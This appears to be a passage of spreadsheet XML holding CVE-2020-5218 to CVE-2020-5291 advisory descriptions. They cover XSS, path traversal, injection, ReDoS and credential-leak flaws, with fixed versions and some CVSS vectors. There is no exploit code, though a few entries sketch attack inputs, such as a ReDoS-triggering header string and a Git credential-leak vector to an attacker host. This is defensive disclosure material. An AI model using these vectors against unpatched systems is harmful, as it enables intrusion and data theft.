    <t>In Secure Headers (RubyGem secure_headers), a directive injection vulnerability is present in versions before 3.8.0, 5.1.0, and 6.2.0. If user-supplied input was passed into append/override_content_security_policy_directives, a semicolon could be injected leading to directive injection. This could be used to e.g. override a script-src directive. Duplicate directives are ignored and the first one wins. The directives in secure_headers are sorted alphabetically so they pretty much all come before script-src. A previously undefined directive would receive a value even if SecureHeaders::OPT_OUT was supplied. The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning when this happens. This will result in innocuous browser console messages if being exploited/accidentally used. In future releases, we will raise application errors resulting in 500s. Depending on what major version you are using, the fixed versions are 6.2.0, 5.1.0, 3.8.0.</t>
  </si>
  <si>
    <t>CVE-2020-5218</t>
  </si>
  <si>
    <t>Affected versions of Sylius give attackers the ability to switch channels via the _channel_code GET parameter in production environments. This was meant to be enabled only when kernel.debug is set to true. However, if no sylius_channel.debug is set explicitly in the configuration, the default value which is kernel.debug will be not resolved and cast to boolean, enabling this debug feature even if that parameter is set to false. Patch has been provided for Sylius 1.3.x and newer - 1.3.16, 1.4.12, 1.5.9, 1.6.5. Versions older than 1.3 are not covered by our security support anymore.</t>
  </si>
  <si>
    <t>CVE-2020-5219</t>
  </si>
  <si>
    <t>Angular Expressions before version 1.0.1 has a remote code execution vulnerability if you call expressions.compile(userControlledInput) where userControlledInput is text that comes from user input. If running angular-expressions in the browser, an attacker could run any browser script when the application code calls expressions.compile(userControlledInput). If running angular-expressions on the server, an attacker could run any Javascript expression, thus gaining Remote Code Execution.</t>
  </si>
  <si>
    <t>CVE-2020-5220</t>
  </si>
  <si>
    <t>Sylius ResourceBundle accepts and uses any serialisation groups to be passed via a HTTP header. This might lead to data exposure by using an unintended serialisation group - for example it could make Shop API use a more permissive group from Admin API. Anyone exposing an API with ResourceBundle's controller is affected. The vulnerable versions are: &lt;1.3 || &gt;=1.3.0 &lt;=1.3.12 || &gt;=1.4.0 &lt;=1.4.5 || &gt;=1.5.0 &lt;=1.5.0 || &gt;=1.6.0 &lt;=1.6.2. The patch is provided for Sylius ResourceBundle 1.3.13, 1.4.6, 1.5.1 and 1.6.3, but not for any versions below 1.3.</t>
  </si>
  <si>
    <t>CVE-2020-5221</t>
  </si>
  <si>
    <t>In uftpd before 2.11, it is possible for an unauthenticated user to perform a directory traversal attack using multiple different FTP commands and read and write to arbitrary locations on the filesystem due to the lack of a well-written chroot jail in compose_abspath(). This has been fixed in version 2.11</t>
  </si>
  <si>
    <t>CVE-2020-5222</t>
  </si>
  <si>
    <t>Opencast before 7.6 and 8.1 enables a remember-me cookie based on a hash created from the username, password, and an additional system key. This means that an attacker getting access to a remember-me token for one server can get access to all servers which allow log-in using the same credentials without ever needing the credentials. This problem is fixed in Opencast 7.6 and Opencast 8.1</t>
  </si>
  <si>
    <t>CVE-2020-5223</t>
  </si>
  <si>
    <t>In PrivateBin versions 1.2.0 before 1.2.2, and 1.3.0 before 1.3.2, a persistent XSS attack is possible. Under certain conditions, a user provided attachment file name can inject HTML leading to a persistent Cross-site scripting (XSS) vulnerability. The vulnerability has been fixed in PrivateBin v1.3.2 &amp; v1.2.2. Admins are urged to upgrade to these versions to protect the affected users.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-5224</t>
  </si>
  <si>
    <t>In Django User Sessions (django-user-sessions) before 1.7.1, the views provided allow users to terminate specific sessions. The session key is used to identify sessions, and thus included in the rendered HTML. In itself this is not a problem. However if the website has an XSS vulnerability, the session key could be extracted by the attacker and a session takeover could happen.</t>
  </si>
  <si>
    <t>CVE-2020-5225</t>
  </si>
  <si>
    <t>Log injection in SimpleSAMLphp before version 1.18.4. The www/erroreport.php script, which receives error reports and sends them via email to the system administrator, did not properly sanitize the report identifier obtained from the request. This allows an attacker, under specific circumstances, to inject new log lines by manually crafting this report ID. When configured to use the file logging handler, SimpleSAMLphp will output all its logs by appending each log line to a given file. Since the reportID parameter received in a request sent to www/errorreport.php was not properly sanitized, it was possible to inject newline characters into it, effectively allowing a malicious user to inject new log lines with arbitrary content.</t>
  </si>
  <si>
    <t>CVE-2020-5226</t>
  </si>
  <si>
    <t>Cross-site scripting in SimpleSAMLphp before version 1.18.4. The www/erroreport.php script allows error reports to be submitted and sent to the system administrator. Starting with SimpleSAMLphp 1.18.0, a new SimpleSAML\Utils\EMail class was introduced to handle sending emails, implemented as a wrapper of an external dependency. This new wrapper allows us to use Twig templates in order to create the email sent with an error report. Since Twig provides automatic escaping of variables, manual escaping of the free-text field in www/errorreport.php was removed to avoid double escaping. However, for those not using the new user interface yet, an email template is hardcoded into the class itself in plain PHP. Since no escaping is provided in this template, it is then possible to inject HTML inside the template by manually crafting the contents of the free-text field.</t>
  </si>
  <si>
    <t>CVE-2020-5227</t>
  </si>
  <si>
    <t>Feedgen (python feedgen) before 0.9.0 is susceptible to XML Denial of Service attacks. The *feedgen* library allows supplying XML as content for some of the available fields. This XML will be parsed and integrated into the existing XML tree. During this process, feedgen is vulnerable to XML Denial of Service Attacks (e.g. XML Bomb). This becomes a concern in particular if feedgen is used to include content from untrused sources and if XML (including XHTML) is directly included instead of providing plain tex content only. This problem has been fixed in feedgen 0.9.0 which disallows XML entity expansion and external resources.</t>
  </si>
  <si>
    <t>CVE-2020-5228</t>
  </si>
  <si>
    <t>Opencast before 8.1 and 7.6 allows unauthorized public access to all media and metadata by default via OAI-PMH. OAI-PMH is part of the default workflow and is activated by default, requiring active user intervention of users to protect media. This leads to users unknowingly handing out public access to events without their knowledge. The problem has been addressed in Opencast 7.6 and 8.1 where the OAI-PMH endpoint is configured to require users with `ROLE_ADMIN` by default. In addition to this, Opencast 9 removes the OAI-PMH publication from the default workflow, making the publication a conscious decision users have to make by updating their workflows.</t>
  </si>
  <si>
    <t>CVE-2020-5229</t>
  </si>
  <si>
    <t>Opencast before 8.1 stores passwords using the rather outdated and cryptographically insecure MD5 hash algorithm. Furthermore, the hashes are salted using the username instead of a random salt, causing hashes for users with the same username and password to collide which is problematic especially for popular users like the default `admin` user. This essentially means that for an attacker, it might be feasible to reconstruct a user's password given access to these hashes. Note that attackers needing access to the hashes means that they must gain access to the database in which these are stored first to be able to start cracking the passwords. The problem is addressed in Opencast 8.1 which now uses the modern and much stronger bcrypt password hashing algorithm for storing passwords. Note, that old hashes remain MD5 until the password is updated. For a list of users whose password hashes are stored using MD5, take a look at the `/user-utils/users/md5.json` REST endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-5230</t>
  </si>
  <si>
    <t>Opencast before 8.1 and 7.6 allows almost arbitrary identifiers for media packages and elements to be used. This can be problematic for operation and security since such identifiers are sometimes used for file system operations which may lead to an attacker being able to escape working directories and write files to other locations. In addition, Opencast's Id.toString(…) vs Id.compact(…) behavior, the latter trying to mitigate some of the file system problems, can cause errors due to identifier mismatch since an identifier may unintentionally change. This issue is fixed in Opencast 7.6 and 8.1.</t>
  </si>
  <si>
    <t>CVE-2020-5231</t>
  </si>
  <si>
    <t>In Opencast before 7.6 and 8.1, users with the role ROLE_COURSE_ADMIN can use the user-utils endpoint to create new users not including the role ROLE_ADMIN. ROLE_COURSE_ADMIN is a non-standard role in Opencast which is referenced neither in the documentation nor in any code (except for tests) but only in the security configuration. From the name – implying an admin for a specific course – users would never expect that this role allows user creation. This issue is fixed in 7.6 and 8.1 which both ship a new default security configuration.</t>
  </si>
  <si>
    <t>CVE-2020-5232</t>
  </si>
  <si>
    <t>A user who owns an ENS domain can set a trapdoor, allowing them to transfer ownership to another user, and later regain ownership without the new owners consent or awareness. A new ENS deployment is being rolled out that fixes this vulnerability in the ENS registry.</t>
  </si>
  <si>
    <t>CVE-2020-5233</t>
  </si>
  <si>
    <t>OAuth2 Proxy before 5.0 has an open redirect vulnerability. Authentication tokens could be silently harvested by an attacker. This has been patched in version 5.0.</t>
  </si>
  <si>
    <t>CVE-2020-5234</t>
  </si>
  <si>
    <t>MessagePack for C# and Unity before version 1.9.11 and 2.1.90 has a vulnerability where untrusted data can lead to DoS attack due to hash collisions and stack overflow. Review the linked GitHub Security Advisory for more information and remediation steps.</t>
  </si>
  <si>
    <t>CVE-2020-5235</t>
  </si>
  <si>
    <t>There is a potentially exploitable out of memory condition In Nanopb before 0.4.1, 0.3.9.5, and 0.2.9.4. When nanopb is compiled with PB_ENABLE_MALLOC, the message to be decoded contains a repeated string, bytes or message field and realloc() runs out of memory when expanding the array nanopb can end up calling `free()` on a pointer value that comes from uninitialized memory. Depending on platform this can result in a crash or further memory corruption, which may be exploitable in some cases. This problem is fixed in nanopb-0.4.1, nanopb-0.3.9.5, nanopb-0.2.9.4.</t>
  </si>
  <si>
    <t>CVE-2020-5236</t>
  </si>
  <si>
    <t>Waitress version 1.4.2 allows a DOS attack When waitress receives a header that contains invalid characters. When a header like "Bad-header: xxxxxxxxxxxxxxx\x10" is received, it will cause the regular expression engine to catastrophically backtrack causing the process to use 100% CPU time and blocking any other interactions. This allows an attacker to send a single request with an invalid header and take the service offline. This issue was introduced in version 1.4.2 when the regular expression was updated to attempt to match the behaviour required by errata associated with RFC7230. The regular expression that is used to validate incoming headers has been updated in version 1.4.3, it is recommended that people upgrade to the new version of Waitress as soon as possible.</t>
  </si>
  <si>
    <t>CVE-2020-5237</t>
  </si>
  <si>
    <t>Multiple relative path traversal vulnerabilities in the oneup/uploader-bundle before 1.9.3 and 2.1.5 allow remote attackers to upload, copy, and modify files on the filesystem (potentially leading to arbitrary code execution) via the (1) filename parameter to BlueimpController.php; the (2) dzchunkindex, (3) dzuuid, or (4) filename parameter to DropzoneController.php; the (5) qqpartindex, (6) qqfilename, or (7) qquuid parameter to FineUploaderController.php; the (8) x-file-id or (9) x-file-name parameter to MooUploadController.php; or the (10) name or (11) chunk parameter to PluploadController.php. This is fixed in versions 1.9.3 and 2.1.5.</t>
  </si>
  <si>
    <t>CVE-2020-5238</t>
  </si>
  <si>
    <t>The table extension in GitHub Flavored Markdown before version 0.29.0.gfm.1 takes O(n * n) time to parse certain inputs. An attacker could craft a markdown table which would take an unreasonably long time to process, causing a denial of service. This issue does not affect the upstream cmark project. The issue has been fixed in version 0.29.0.gfm.1.</t>
  </si>
  <si>
    <t>CVE-2020-5239</t>
  </si>
  <si>
    <t>In Mailu before version 1.7, an authenticated user can exploit a vulnerability in Mailu fetchmail script and gain full access to a Mailu instance. Mailu servers that have open registration or untrusted users are most impacted. The master and 1.7 branches are patched on our git repository. All Docker images published on docker.io/mailu for tags 1.5, 1.6, 1.7 and master are patched. For detailed instructions about patching and securing the server afterwards, see https://github.com/Mailu/Mailu/issues/1354</t>
  </si>
  <si>
    <t>CVE-2020-5240</t>
  </si>
  <si>
    <t>In wagtail-2fa before 1.4.1, any user with access to the CMS can view and delete other users 2FA devices by going to the correct path. The user does not require special permissions in order to do so. By deleting the other users device they can disable the target users 2FA devices and potentially compromise the account if they figure out their password. The problem has been patched in version 1.4.1.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-5241</t>
  </si>
  <si>
    <t>matestack-ui-core (RubyGem) before 0.7.4 is vulnerable to XSS/Script injection. This vulnerability is patched in version 0.7.4.</t>
  </si>
  <si>
    <t>CVE-2020-5242</t>
  </si>
  <si>
    <t>openHAB before 2.5.2 allow a remote attacker to use REST calls to install the EXEC binding or EXEC transformation service and execute arbitrary commands on the system with the privileges of the user running openHAB. Starting with version 2.5.2 all commands need to be whitelisted in a local file which cannot be changed via REST calls.</t>
  </si>
  <si>
    <t>CVE-2020-5243</t>
  </si>
  <si>
    <t>uap-core before 0.7.3 is vulnerable to a denial of service attack when processing crafted User-Agent strings. Some regexes are vulnerable to regular expression denial of service (REDoS) due to overlapping capture groups. This allows remote attackers to overload a server by setting the User-Agent header in an HTTP(S) request to maliciously crafted long strings. This has been patched in uap-core 0.7.3.</t>
  </si>
  <si>
    <t>CVE-2020-5244</t>
  </si>
  <si>
    <t>In BuddyPress before 5.1.2, requests to a certain REST API endpoint can result in private user data getting exposed. Authentication is not needed. This has been patched in version 5.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-5245</t>
  </si>
  <si>
    <t>Dropwizard-Validation before 1.3.19, and 2.0.2 may allow arbitrary code execution on the host system, with the privileges of the Dropwizard service account, by injecting arbitrary Java Expression Language expressions when using the self-validating feature. The issue has been fixed in dropwizard-validation 1.3.19 and 2.0.2.</t>
  </si>
  <si>
    <t>CVE-2020-5246</t>
  </si>
  <si>
    <t>Traccar GPS Tracking System before version 4.9 has a LDAP injection vulnerability. It occurs when user input is being used in LDAP search filter. By providing specially crafted input, an attacker can modify the logic of the LDAP query and get admin privileges. The issue only impacts instances with LDAP configuration and where users can craft their own names. This has been patched in version 4.9.</t>
  </si>
  <si>
    <t>CVE-2020-5247</t>
  </si>
  <si>
    <t>In Puma (RubyGem) before 4.3.2 and before 3.12.3, if an application using Puma allows untrusted input in a response header, an attacker can use newline characters (i.e. `CR`, `LF` or`/r`, `/n`) to end the header and inject malicious content, such as additional headers or an entirely new response body. This vulnerability is known as HTTP Response Splitting. While not an attack in itself, response splitting is a vector for several other attacks, such as cross-site scripting (XSS). This is related to CVE-2019-16254, which fixed this vulnerability for the WEBrick Ruby web server. This has been fixed in versions 4.3.2 and 3.12.3 by checking all headers for line endings and rejecting headers with those characters.</t>
  </si>
  <si>
    <t>CVE-2020-5248</t>
  </si>
  <si>
    <t>GLPI before before version 9.4.6 has a vulnerability involving a default encryption key. GLPIKEY is public and is used on every instance. This means anyone can decrypt sensitive data stored using this key. It is possible to change the key before installing GLPI. But on existing instances, data must be reencrypted with the new key. Problem is we can not know which columns or rows in the database are using that; espcially from plugins. Changing the key without updating data would lend in bad password sent from glpi; but storing them again from the UI will work.</t>
  </si>
  <si>
    <t>CVE-2020-5249</t>
  </si>
  <si>
    <t>In Puma (RubyGem) before 4.3.3 and 3.12.4, if an application using Puma allows untrusted input in an early-hints header, an attacker can use a carriage return character to end the header and inject malicious content, such as additional headers or an entirely new response body. This vulnerability is known as HTTP Response Splitting. While not an attack in itself, response splitting is a vector for several other attacks, such as cross-site scripting (XSS). This is related to CVE-2020-5247, which fixed this vulnerability but only for regular responses. This has been fixed in 4.3.3 and 3.12.4.</t>
  </si>
  <si>
    <t>CVE-2020-5250</t>
  </si>
  <si>
    <t>In PrestaShop before version 1.7.6.4, when a customer edits their address, they can freely change the id_address in the form, and thus steal someone else's address. It is the same with CustomerForm, you are able to change the id_customer and change all information of all accounts. The problem is patched in version 1.7.6.4.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-5251</t>
  </si>
  <si>
    <t>In parser-server before version 4.1.0, you can fetch all the users objects, by using regex in the NoSQL query. Using the NoSQL, you can use a regex on sessionToken and find valid accounts this way.</t>
  </si>
  <si>
    <t>CVE-2020-5252</t>
  </si>
  <si>
    <t>The command-line "safety" package for Python has a potential security issue. There are two Python characteristics that allow malicious code to “poison-pill” command-line Safety package detection routines by disguising, or obfuscating, other malicious or non-secure packages. This vulnerability is considered to be of low severity because the attack makes use of an existing Python condition, not the Safety tool itself. This can happen if: You are running Safety in a Python environment that you don’t trust. You are running Safety from the same Python environment where you have your dependencies installed. Dependency packages are being installed arbitrarily or without proper verification. Users can mitigate this issue by doing any of the following: Perform a static analysis by installing Docker and running the Safety Docker image: $ docker run --rm -it pyupio/safety check -r requirements.txt Run Safety against a static dependencies list, such as the requirements.txt file, in a separate, clean Python environment. Run Safety from a Continuous Integration pipeline. Use PyUp.io, which runs Safety in a controlled environment and checks Python for dependencies without any need to install them. Use PyUp's Online Requirements Checker.</t>
  </si>
  <si>
    <t>CVE-2020-5253</t>
  </si>
  <si>
    <t>NetHack before version 3.6.0 allowed malicious use of escaping of characters in the configuration file (usually .nethackrc) which could be exploited. This bug is patched in NetHack 3.6.0.</t>
  </si>
  <si>
    <t>CVE-2020-5254</t>
  </si>
  <si>
    <t>In NetHack before 3.6.6, some out-of-bound values for the hilite_status option can be exploited. NetHack 3.6.6 resolves this issue.</t>
  </si>
  <si>
    <t>CVE-2020-5255</t>
  </si>
  <si>
    <t>In Symfony before versions 4.4.7 and 5.0.7, when a `Response` does not contain a `Content-Type` header, affected versions of Symfony can fallback to the format defined in the `Accept` header of the request, leading to a possible mismatch between the response&amp;#39;s content and `Content-Type` header. When the response is cached, this can prevent the use of the website by other users. This has been patched in versions 4.4.7 and 5.0.7.</t>
  </si>
  <si>
    <t>CVE-2020-5256</t>
  </si>
  <si>
    <t>BookStack before version 0.25.5 has a vulnerability where a user could upload PHP files through image upload functions, which would allow them to execute code on the host system remotely. They would then have the permissions of the PHP process. This most impacts scenarios where non-trusted users are given permission to upload images in any area of the application. The issue was addressed in a series of patches in versions 0.25.3, 0.25.4 and 0.25.5. Users should upgrade to at least v0.25.5 to avoid this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-5257</t>
  </si>
  <si>
    <t>In Administrate (rubygem) before version 0.13.0, when sorting by attributes on a dashboard, the direction parameter was not validated before being interpolated into the SQL query. This could present a SQL injection if the attacker were able to modify the `direction` parameter and bypass ActiveRecord SQL protections. Whilst this does have a high-impact, to exploit this you need access to the Administrate dashboards, which we would expect to be behind authentication. This is patched in wersion 0.13.0.</t>
  </si>
  <si>
    <t>CVE-2020-5258</t>
  </si>
  <si>
    <t>In affected versions of dojo (NPM package), the deepCopy method is vulnerable to Prototype Pollution. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. This has been patched in versions 1.12.8, 1.13.7, 1.14.6, 1.15.3 and 1.16.2</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-5259</t>
  </si>
  <si>
    <t>In affected versions of dojox (NPM package), the jqMix method is vulnerable to Prototype Pollution. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. This has been patched in versions 1.11.10, 1.12.8, 1.13.7, 1.14.6, 1.15.3 and 1.16.2</t>
  </si>
  <si>
    <t>CVE-2020-5260</t>
  </si>
  <si>
    <t>Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that contain an encoded newline can inject unintended values into the credential helper protocol stream, causing the credential helper to retrieve the password for one server (e.g., good.example.com) for an HTTP request being made to another server (e.g., evil.example.com), resulting in credentials for the former being sent to the latter. There are no restrictions on the relationship between the two, meaning that an attacker can craft a URL that will present stored credentials for any host to a host of their choosing. The vulnerability can be triggered by feeding a malicious URL to git clone. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The problem has been patched in the versions published on April 14th, 2020, going back to v2.17.x. Anyone wishing to backport the change further can do so by applying commit 9a6bbee (the full release includes extra checks for git fsck, but that commit is sufficient to protect clients against the vulnerability). The patched versions are: 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, 2.26.1.</t>
  </si>
  <si>
    <t>CVE-2020-5261</t>
  </si>
  <si>
    <t>Saml2 Authentication services for ASP.NET (NuGet package Sustainsys.Saml2) greater than 2.0.0, and less than version 2.5.0 has a faulty implementation of Token Replay Detection. Token Replay Detection is an important defence in depth measure for Single Sign On solutions. The 2.5.0 version is patched. Note that version 1.0.1 is not affected. It has a correct Token Replay Implementation and is safe to use. Saml2 Authentication services for ASP.NET (NuGet package Sustainsys.Saml2) greater than 2.0.0, and less than version 2.5.0 have a faulty implementation of Token Replay Detection. Token Replay Detection is an important defense measure for Single Sign On solutions. The 2.5.0 version is patched. Note that version 1.0.1 and prior versions are not affected. These versions have a correct Token Replay Implementation and are safe to use.</t>
  </si>
  <si>
    <t>CVE-2020-5262</t>
  </si>
  <si>
    <t>In EasyBuild before version 4.1.2, the GitHub Personal Access Token (PAT) used by EasyBuild for the GitHub integration features (like `--new-pr`, `--fro,-pr`, etc.) is shown in plain text in EasyBuild debug log files. This issue is fixed in EasyBuild v4.1.2, and in the `master`+ `develop` branches of the `easybuild-framework` repository.</t>
  </si>
  <si>
    <t>CVE-2020-5263</t>
  </si>
  <si>
    <t>auth0.js (NPM package auth0-js) greater than version 8.0.0 and before version 9.12.3 has a vulnerability. In the case of an (authentication) error, the error object returned by the library contains the original request of the user, which may include the plaintext password the user entered. If the error object is exposed or logged without modification, the application risks password exposure. This is fixed in version 9.12.3</t>
  </si>
  <si>
    <t>CVE-2020-5264</t>
  </si>
  <si>
    <t>In PrestaShop before version 1.7.6.5, there is a reflected XSS while running the security compromised page. It allows anyone to execute arbitrary action. The problem is patched in the 1.7.6.5.</t>
  </si>
  <si>
    <t>CVE-2020-5265</t>
  </si>
  <si>
    <t>In PrestaShop between versions 1.7.6.1 and 1.7.6.5, there is a reflected XSS on AdminAttributesGroups page. The problem is patched in 1.7.6.5.</t>
  </si>
  <si>
    <t>CVE-2020-5266</t>
  </si>
  <si>
    <t>In the ps_link module for PrestaShop before version 3.1.0, there is a stored XSS when you create or edit a link list block with the title field. The problem is fixed in 3.1.0</t>
  </si>
  <si>
    <t>CVE-2020-5267</t>
  </si>
  <si>
    <t>In ActionView before versions 6.0.2.2 and 5.2.4.2, there is a possible XSS vulnerability in ActionView's JavaScript literal escape helpers. Views that use the `j` or `escape_javascript` methods may be susceptible to XSS attacks. The issue is fixed in versions 6.0.2.2 and 5.2.4.2.</t>
  </si>
  <si>
    <t>CVE-2020-5268</t>
  </si>
  <si>
    <t>In Saml2 Authentication Services for ASP.NET versions before 1.0.2, and between 2.0.0 and 2.6.0, there is a vulnerability in how tokens are validated in some cases. Saml2 tokens are usually used as bearer tokens - a caller that presents a token is assumed to be the subject of the token. There is also support in the Saml2 protocol for issuing tokens that is tied to a subject through other means, e.g. holder-of-key where possession of a private key must be proved. The Sustainsys.Saml2 library incorrectly treats all incoming tokens as bearer tokens, even though they have another subject confirmation method specified. This could be used by an attacker that could get access to Saml2 tokens with another subject confirmation method than bearer. The attacker could then use such a token to create a log in session. This vulnerability is patched in versions 1.0.2 and 2.7.0.</t>
  </si>
  <si>
    <t>CVE-2020-5269</t>
  </si>
  <si>
    <t>In PrestaShop between versions 1.7.6.1 and 1.7.6.5, there is a reflected XSS on AdminFeatures page by using the `id_feature` parameter. The problem is fixed in 1.7.6.5</t>
  </si>
  <si>
    <t>CVE-2020-5270</t>
  </si>
  <si>
    <t>In PrestaShop between versions 1.7.6.0 and 1.7.6.5, there is an open redirection when using back parameter. The impacts can be many, and vary from the theft of information and credentials to the redirection to malicious websites containing attacker-controlled content, which in some cases even cause XSS attacks. So even though an open redirection might sound harmless at first, the impacts of it can be severe should it be exploitable. The problem is fixed in 1.7.6.5</t>
  </si>
  <si>
    <t>CVE-2020-5271</t>
  </si>
  <si>
    <t>In PrestaShop between versions 1.6.0.0 and 1.7.6.5, there is a reflected XSS with `date_from` and `date_to` parameters in the dashboard page This problem is fixed in 1.7.6.5</t>
  </si>
  <si>
    <t>CVE-2020-5272</t>
  </si>
  <si>
    <t>In PrestaShop between versions 1.5.5.0 and 1.7.6.5, there is a reflected XSS on Search page with `alias` and `search` parameters. The problem is patched in 1.7.6.5</t>
  </si>
  <si>
    <t>CVE-2020-5273</t>
  </si>
  <si>
    <t>In PrestaShop module ps_linklist versions before 3.1.0, there is a stored XSS when using custom URLs. The problem is fixed in version 3.1.0</t>
  </si>
  <si>
    <t>CVE-2020-5274</t>
  </si>
  <si>
    <t>In Symfony before versions 5.0.5 and 4.4.5, some properties of the Exception were not properly escaped when the `ErrorHandler` rendered it stacktrace. In addition, the stacktrace were displayed even in a non-debug configuration. The ErrorHandler now escape alls properties of the exception, and the stacktrace is only display in debug configuration. This issue is patched in symfony/http-foundation versions 4.4.5 and 5.0.5</t>
  </si>
  <si>
    <t>CVE-2020-5275</t>
  </si>
  <si>
    <t>In symfony/security-http before versions 4.4.7 and 5.0.7, when a `Firewall` checks access control rule, it iterate overs each rule's attributes and stops as soon as the accessDecisionManager decides to grant access on the attribute, preventing the check of next attributes that should have been take into account in an unanimous strategy. The accessDecisionManager is now called with all attributes at once, allowing the unanimous strategy being applied on each attribute. This issue is patched in versions 4.4.7 and 5.0.7.</t>
  </si>
  <si>
    <t>CVE-2020-5276</t>
  </si>
  <si>
    <t>In PrestaShop between versions 1.7.1.0 and 1.7.6.5, there is a reflected XSS on AdminCarts page with `cartBox` parameter The problem is fixed in 1.7.6.5</t>
  </si>
  <si>
    <t>CVE-2020-5277</t>
  </si>
  <si>
    <t>PrestaShop module ps_facetedsearch versions before 3.5.0 has a reflected XSS with `url_name` parameter. The problem is fixed in 3.5.0</t>
  </si>
  <si>
    <t>CVE-2020-5278</t>
  </si>
  <si>
    <t>In PrestaShop between versions 1.5.4.0 and 1.7.6.5, there is a reflected XSS on Exception page The problem is fixed in 1.7.6.5</t>
  </si>
  <si>
    <t>CVE-2020-5279</t>
  </si>
  <si>
    <t>In PrestaShop between versions 1.5.0.0 and 1.7.6.5, there are improper access control since the the version 1.5.0.0 for legacy controllers. - admin-dev/index.php/configure/shop/customer-preferences/ - admin-dev/index.php/improve/international/translations/ - admin-dev/index.php/improve/international/geolocation/ - admin-dev/index.php/improve/international/localization - admin-dev/index.php/configure/advanced/performance - admin-dev/index.php/sell/orders/delivery-slips/ - admin-dev/index.php?controller=AdminStatuses The problem is fixed in 1.7.6.5</t>
  </si>
  <si>
    <t>CVE-2020-5280</t>
  </si>
  <si>
    <t>http4s before versions 0.18.26, 0.20.20, and 0.21.2 has a local file inclusion vulnerability. This vulnerability applies to all users of org.http4s.server.staticcontent.FileService, org.http4s.server.staticcontent.ResourceService and org.http4s.server.staticcontent.WebjarService. URI normalization is applied incorrectly. Requests whose path info contain ../ or // can expose resources outside of the configured location. This issue is patched in versions 0.18.26, 0.20.20, and 0.21.2. Note that 0.19.0 is a deprecated release and has never been supported.</t>
  </si>
  <si>
    <t>CVE-2020-5281</t>
  </si>
  <si>
    <t>In Perun before version 3.9.1, VO or group manager can modify configuration of the LDAP extSource to retrieve all from Perun LDAP. Issue is fixed in version 3.9.1 by sanitisation of the input.</t>
  </si>
  <si>
    <t>CVE-2020-5282</t>
  </si>
  <si>
    <t>In Nick Chan Bot before version 1.0.0-beta there is a vulnerability in the `npm` command which is part of this software package. This allows arbitrary shell execution,which can compromise the bot This is patched in version 1.0.0-beta</t>
  </si>
  <si>
    <t>CVE-2020-5283</t>
  </si>
  <si>
    <t>ViewVC before versions 1.1.28 and 1.2.1 has a XSS vulnerability in CVS show_subdir_lastmod support. The impact of this vulnerability is mitigated by the need for an attacker to have commit privileges to a CVS repository exposed by an otherwise trusted ViewVC instance that also has the `show_subdir_lastmod` feature enabled. The attack vector involves files with unsafe names (names that, when embedded into an HTML stream, would cause the browser to run unwanted code), which themselves can be challenging to create. This vulnerability is patched in versions 1.2.1 and 1.1.28.</t>
  </si>
  <si>
    <t>CVE-2020-5284</t>
  </si>
  <si>
    <t>Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.</t>
  </si>
  <si>
    <t>CVE-2020-5285</t>
  </si>
  <si>
    <t>In PrestaShop between versions 1.7.6.0 and 1.7.6.5, there is a reflected XSS with `back` parameter. The problem is fixed in 1.7.6.5</t>
  </si>
  <si>
    <t>CVE-2020-5286</t>
  </si>
  <si>
    <t>In PrestaShop between versions 1.7.4.0 and 1.7.6.5, there is a reflected XSS when uploading a wrong file. The problem is fixed in 1.7.6.5</t>
  </si>
  <si>
    <t>CVE-2020-5287</t>
  </si>
  <si>
    <t>In PrestaShop between versions 1.5.5.0 and 1.7.6.5, there is improper access control on customers search. The problem is fixed in 1.7.6.5.</t>
  </si>
  <si>
    <t>CVE-2020-5288</t>
  </si>
  <si>
    <t>"In PrestaShop between versions 1.7.0.0 and 1.7.6.5, there is improper access controls on product attributes page. The problem is fixed in 1.7.6.5.</t>
  </si>
  <si>
    <t>CVE-2020-5289</t>
  </si>
  <si>
    <t>In Elide before 4.5.14, it is possible for an adversary to "guess and check" the value of a model field they do not have access to assuming they can read at least one other field in the model. The adversary can construct filter expressions for an inaccessible field to filter a collection. The presence or absence of models in the returned collection can be used to reconstruct the value of the inaccessible field. Resolved in Elide 4.5.14 and greater.</t>
  </si>
  <si>
    <t>CVE-2020-5290</t>
  </si>
  <si>
    <t>In RedpwnCTF before version 2.3, there is a session fixation vulnerability in exploitable through the `#token=$ssid` hash when making a request to the `/verify` endpoint. An attacker team could potentially steal flags by, for example, exploiting a stored XSS payload in a CTF challenge so that victim teams who solve the challenge are unknowingly (and against their will) signed into the attacker team&amp;#39;s account. Then, the attacker can gain points / value off the backs of the victims. This is patched in version 2.3.</t>
  </si>
  <si>
    <t>CVE-2020-5291</t>
  </si>
  <si>
